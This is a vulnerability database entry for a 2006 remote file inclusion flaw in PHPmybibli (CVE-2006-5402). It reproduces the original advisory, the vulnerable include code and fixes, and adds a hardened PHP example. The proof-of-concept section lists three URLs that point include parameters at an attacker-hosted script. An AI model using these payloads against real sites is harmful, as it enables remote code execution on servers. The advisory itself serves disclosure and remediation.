PHPMybibli Multiple PHP Remote File Inclusion Vulnerabilities

Vulnerability ID: 1111316
Vulnerability type: Code injection
Published: 2006-10-17
Updated: 2006-10-24
CVE: CVE-2006-5402
CNNVD ID: CNNVD-200610-309
Platform: PHP
CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/2585
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-309
|Details
Multiple PHP remote file inclusion vulnerabilities in PHPmybibli 3.0.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in (1) the class_path, (2) the javascript_path and (3) the include_path parameters of (a) cart.php; (4) the class_path parameter of (b) index.php; (5) the javascript_path parameter of (c) edit.php; (6) the include_path parameter of (d) circ.php; unspecified parameters of (e) select.php; and unspecified parameters of other files.
|Exploit
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                              .OR.ID
ECHO_ADV_55$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_55$2006]Phpmybibli  <=2.1  Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author		: Dedi Dwianto a.k.a the_day
Date Found	: October, 17th 2006
Location	: Indonesia, Jakarta
web		: http://advisories.echo.or.id/adv/adv55-theday-2006.txt
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: PHPmybibli
version		: <=2.1
URL		: http://www.pizz.net/

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

I found a vulnerable script, cart.php:
--------------------------cart.php---------------------------------------
....
<?

  include_once("$include_path/cart.inc.php");
  include_once("$include_path/templates/cart.tpl.php");
  include_once("$include_path/isbn.inc.php");
  include_once("$include_path/expl_info.inc.php");
  include_once("$include_path/bull_info.inc.php");
  include_once("$include_path/notice_authors.inc.php");
  include_once("$include_path/notice_categories.inc.php");
  include_once("$include_path/explnum.inc.php");
  include_once("$class_path/cart.class.php");
  include_once("$class_path/caddie.class.php");
  include_once("$class_path/author.class.php");
  include_once("$class_path/collection.class.php");
  include_once("$class_path/subcollection.class.php");
  include_once("$class_path/mono_display.class.php");
  include_once("$class_path/serie.class.php");
  include_once("$class_path/serial_display.class.php");
  include_once("$class_path/serials.class.php");
  include_once("$class_path/editor.class.php");
  require_once("$class_path/emprunteur.class.php");
  require_once("$javascript_path/misc.inc.php");
...
----------------------------------------------------------

Input passed to the "$include_path" parameter in cart.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Other affected files:

edit.php
circ.php
index.php
select.php
etc.

Proof Of Concept:
~~~~~~~~~~~~~~

http://target.com/[phpmybibli_path]/index.php?class_path=http://attacker.com/inject.txt?
http://target.com/[phpmybibli_path]/edit.php?javascript_path=http://attacker.com/inject.txt?
http://target.com/[phpmybibli_path]/circ.php?include_path=http://attacker.com/inject.txt?

Solution:
~~~~~~

- Sanitize the variables $class_path, $javascript_path and $include_path in the affected files.
- Turn off register_globals.


---------------------------------------------------------------------------

Shoutz:
~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~
     EcHo Research & Development Center
     the_day[at]echo[dot]or[dot]id
     
-------------------------------- [ EOF ]----------------------------------

# milw0rm.com [2006-10-17]
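The two fixes from the Solution section, as an added example that is not PHPmybibli's own code: a hardened prologue for a script such as cart.php in which the three include directories are server-side constants rather than register_globals variables, and a helper (safe_include_dir, a name chosen here; APP_ROOT is assumed to be the script's own directory) refuses any directory that is a stream-wrapper URL or lies outside the application root.

```php
<?php
// Added example, not PHPmybibli's own code: hardened prologue for cart.php.
// The include directories are fixed server-side values, so a request parameter
// named include_path, class_path or javascript_path can no longer reach
// include_once(); safe_include_dir() (helper name chosen here) additionally
// refuses anything that is a stream-wrapper URL or lies outside APP_ROOT.
declare(strict_types=1);

// Application root; assumed to be the directory holding this script.
define('APP_ROOT', __DIR__);

// Returns the canonical directory when $candidate is a real, local directory
// inside $root, otherwise null.
function safe_include_dir(string $candidate, string $root): ?string
{
    // "http://", "ftp://", "php://", "data:" all start with a scheme;
    // a plain directory never does.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $candidate) === 1) {
        return null;
    }
    $real     = realpath($candidate);   // resolves "..", symlinks; false if absent
    $rootReal = realpath($root);
    if ($real === false || $rootReal === false || !is_dir($real)) {
        return null;
    }
    // Compare with a trailing separator so "/app-evil" does not pass as "/app".
    if ($real !== $rootReal
        && strpos($real, $rootReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Server-controlled values replace the register_globals variables used by the
// vulnerable code; nothing from $_GET, $_POST or $_COOKIE is consulted.
$include_path    = APP_ROOT . '/includes';
$class_path      = APP_ROOT . '/classes';
$javascript_path = APP_ROOT . '/javascript';

foreach (['include_path', 'class_path', 'javascript_path'] as $name) {
    if (safe_include_dir($$name, APP_ROOT) === null) {
        http_response_code(500);
        exit("Configuration error: \$$name is not a directory under APP_ROOT");
    }
}

// Same includes as the original cart.php, now with trustworthy directories.
include_once "$include_path/cart.inc.php";
include_once "$class_path/cart.class.php";
require_once "$javascript_path/misc.inc.php";
```

The in-code check complements, rather than replaces, the php.ini controls: register_globals=Off (the directive was removed entirely in PHP 5.4) and allow_url_include=Off stop the same class of injection at the interpreter level.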
|References

Source: BID | Name: 20578 | Link: http://www.securityfocus.com/bid/20578
Source: XF | Name: phpmybibli-includepath-file-include(29627) | Link: http://xforce.iss.net/xforce/xfdb/29627
Source: www.sigb.net | Link: http://www.sigb.net/patch.php
Source: VUPEN | Name: ADV-2006-4064 | Link: http://www.frsirt.com/english/advisories/2006/4064
Source: BUGTRAQ | Name: 20061017 [ECHO_ADV_55$2006] Phpmybibli <= 2.1 Multiple Remote File Inclusion Vulnerability | Link: http://marc.theaimsgroup.com/?l=bugtraq&m=116110988829381&w=2
Source: VIM | Name: 20061019 CVE-2006-5402, fishy? | Link: http://attrition.org/pipermail/vim/2006-October/001088.html
Source: VIM | Name: 20061018 CVE-2006-5402, fishy? | Link: http://attrition.org/pipermail/vim/2006-October/001087.html
Source: MISC | Link: http://advisories.echo.or.id/adv/adv55-theday-2006.txt